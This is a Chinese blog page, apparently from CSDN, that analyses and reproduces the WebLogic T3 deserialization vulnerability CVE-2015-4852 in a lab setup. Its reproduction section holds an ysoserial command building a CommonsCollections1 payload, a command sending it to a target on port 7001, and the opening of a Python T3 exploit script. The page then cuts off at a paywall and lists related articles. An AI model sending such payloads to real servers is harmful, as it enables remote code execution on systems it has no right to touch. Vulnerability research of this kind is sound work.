WebLogic基于T3协议的反序列化之CVE-2015-4852

最新推荐文章于 2024-05-27 19:45:26 发布
最新推荐文章于 2024-05-27 19:45:26 发布
阅读量3.6k 收藏 3
点赞数 1
分类专栏: java安全 文章标签: 安全 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/122743146
版权

前言

WebLogic 中的反序列化漏洞可以分为两种,第一种为基于 T3 协议的反序列化,第二种为基于 XML 的反序列化,下面表格为大概 CVE 分布,在基于 T3 的反序列化漏洞中,很多是基于 CVE-2015-4582 漏洞的一个相关绕过,而对 CVE-2015-4582 漏洞的绕过又大体应该分为两类,下面对 CVE-2015-4582 进行调试分析,为后面的绕过打下基础。

基于 T3 CVE-2015-4582 CVE-2016-0638 CVE-2016-3510 CVE-2018-2628 CVE-2020-2555 CVE-2020-2883
基于 XML CVE-2017-3506 CVE-2017-10271 CVE-2019-2729

漏洞调试环境

WebLogic 系列的漏洞可以用到 Github 上的一个项目 :https://github.com/QAX-A-Team/WeblogicEnvironment

环境搭建参考以下两篇文章即可:

https://www.cnblogs.com/0x7e/p/14529949.html#0x01%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA
https://www.cnblogs.com/nice0e3/p/14201884.html#0x02-%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA

漏洞复现

ysoserial 生成反序列化文件

java -jar ysoserial.jar CommonsCollections1 "touch /poc.txt" > payload.tmp

利用 poc 直接打反序列化文件过去

python2 cve-2015-4852.py 192.168.134.133 7001 D:\payload.ser

cve-2015-4852.py

#!/usr/bin/python
import socket
import struct
import sys

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)

# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\
最低0.47元/天 解锁文章
0x6b79
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java反序列化(之)Weblogic反序列化系列初探 CVE-2015-4852
Vicl1fe的博客
03-24 1505
前言 weblogic反序列化主要有XMLDecoder和T3协议。先从T3协议开始,主要是CVE-2015-4852这个漏洞 环境搭建 https://blog.csdn.net/qq_41918771/article/details/117467957 https://blog.csdn.net/weixin_45682070/article/details/123230456 主要参考这两篇文章,第一篇是我写的,但是由于源不能用了原因,可以参考第二篇 T3协议 T3概述 RMI通信使用的是序列化数
weblogicT3反序列化
weixin_45682070的博客
03-02 2019
T3协议 什么是T3协议? 解释摘抄自此文 Weblogic的RMI规范的实现使用一个专有协议T3。 您可以将T3(和安全T3S)视为坐在http之上的一个图层,以公开/允许客户端的JNDI调用。 通常,T3协议用于与WebLogic控制台进行交互。 T3是用于在WebLogic服务器和其他types的Java程序之间传输信息的协议WebLogic会跟踪连接到应用程序的每个Java虚拟机。 为了将stream量传送到Java虚拟机,WebLogic创build一个T3连接。 这种types的连接通过消除
weblogic漏洞初探之CVE-2015-4852
洋洋的小黑屋
08-13 738
weblogic漏洞初探之CVE-2015-4852 一、环境搭建 1. 搭建docker 这里用了vulhub的环境进行修改:https://vulhub.org/ 新建个文件夹,创建两个文件docker-compose.yml、DockerFile docker-compose.yml: version: '2' services: weblogic: image: vulhub/weblogic:10.3.6.0-2017 ports: - "7001:7001" -
Weblogic T3协议反序列化漏洞[CVE-2018-2628]
最新发布
流水不争先,争的是滔滔不绝
05-27 575
漏洞影响版本【10.3.6.0.0】,【12.1.3.0.0】,【12.2.1.2.0】,【12.2.1.3.0】
CVE-2015-4852 Weblogic T3 反序列化分析
蚁景网安学院
12-07 1623
看到很多师傅的面经里面都有提到 Weblogic 这一个漏洞,最近正好有一些闲暇时间,可以看一看。因为环境上总是有一些小问题,所以会在本地和云服务器切换着调试。
weblogic-T3反序列化
weixin_48776804的博客
05-11 1089
weblogic-T3反序列化
WebLogic基于T3协议反序列化 CVE-2016-0638/CVE-2016-3510
01-29 5032
WebLogic基于T3协议反序列化 CVE-2016-0638/CVE-2016-3510 CVE-2016-0638 是前面分析的 CVE-2015-4852 的一个绕过,通过找到一个不在黑名单中的类,且这个类存在readObject/readResolve/readExternal 方法,并且恰好这些方法里面有一些数据进行反序列化操作,那么这时我们就可以把原生的序列化数据封装到这个类里面,通过调用反序列化对象重写的readObject/readResolve/readExternal 方法这一特点来
WebLogic反序列化CVE-2015-4852CVE-2016-0638、CVE-2016-3510
qq_40710190的博客
07-14 680
weblogic的3个基础cve
Weblogic漏洞Java反序列化CVE-2015-4852解析
simonnews的博客
05-04 5208
weblogic系列_Java反序列化_CVE-2015-4852 1:概述1.1:官方概述1.2:漏洞概述2:漏洞原理分析2.1:基本概念2.1欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也...
Weblogic T3 反序列化学习
qq_31065143的博客
08-03 670
Weblogic T3 反序列化学习 前言 最近在公司实习也没有太多事情,就来学习一下Weblogic听好多师傅讲过很多次了。 这里我使用的是ATEAM大哥开源的搭建工具,感谢前人提供的便捷。我这里本来打算在自己电脑上搭建,但是说多了都是泪,m1适配问题。。。。最后还是跑云服务器上进行了搭建。 搭建过程 下载文件 先从GitHub上面拉取项目,拉取之后创建两个文件夹jdks,weblogics。 jdk下载地址: https://www.oracle.com/technetwork/java/javas
weblogic反序列化T3协议
snowlyzz的博客
01-16 3302
T3反序列化学习
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC
IT界迷者Blog--
10-17 6897
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC #!env python # -*- coding: utf-8 -*- import socket import time import re import sys VUL=['CVE-2018-2893'] #remote ip changed to :127.0.0.1 PAYLOAD=['ACED0005...
CVE-2015-4852 java 反序列化漏洞--weblogic补丁
热门推荐
水滴石穿
01-04 2万+
    CVE-2015-4852 Patch Availability Document for Oracle WebLogic Server Component of Oracle Fusion Middleware (Doc ID 2075927.1) To Bottom APPLIES TO: PeopleSoft Enterprise PT Peo...
weblogicT3协议反序列化复现
san3144393495的博客
04-26 374
Weblogic Server中的RMI 通信使用T3协议Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机。攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞weblogic组件的远程代码执行攻击。端口是JRMP Server:是端口。开始构造pyload。进行base64加密。
反序列化_CVE-2016-7124
yyj1781572的博客
12-06 512
反序列化_CVE-2016-7124
weblogic反序列化T3协议(CVE-2015-4582)
遇事不决冲冲冲
05-12 4432
基于T3协议weblogic反序列化漏洞 之前说过在weblogic里面其实反序列化漏洞利用中大致分为两种,一个是基于T3协议反序列化漏洞,一个是基于XML的反序列化漏洞,这篇来分析一下基于T3协议weblogic,列出几个基于T3协议具有代表性的CVECVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2018-2628、CVE-2020-2555、CVE-2020-2883,每个cve的思路大致都是基于上几个漏洞的补丁进行的一个绕过,本来想逐个分析,这里
CVE-2015-4852
09-11
CVE-2015-4852是一个WebLogic反序列化漏洞,它通过利用特定的poc文件进行攻击。可以使用如下命令进行攻击: python2 cve-2015-4852.py 192.168.134.133 7001 D:\payload.ser 该漏洞涉及到了InvokerTransformer类的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值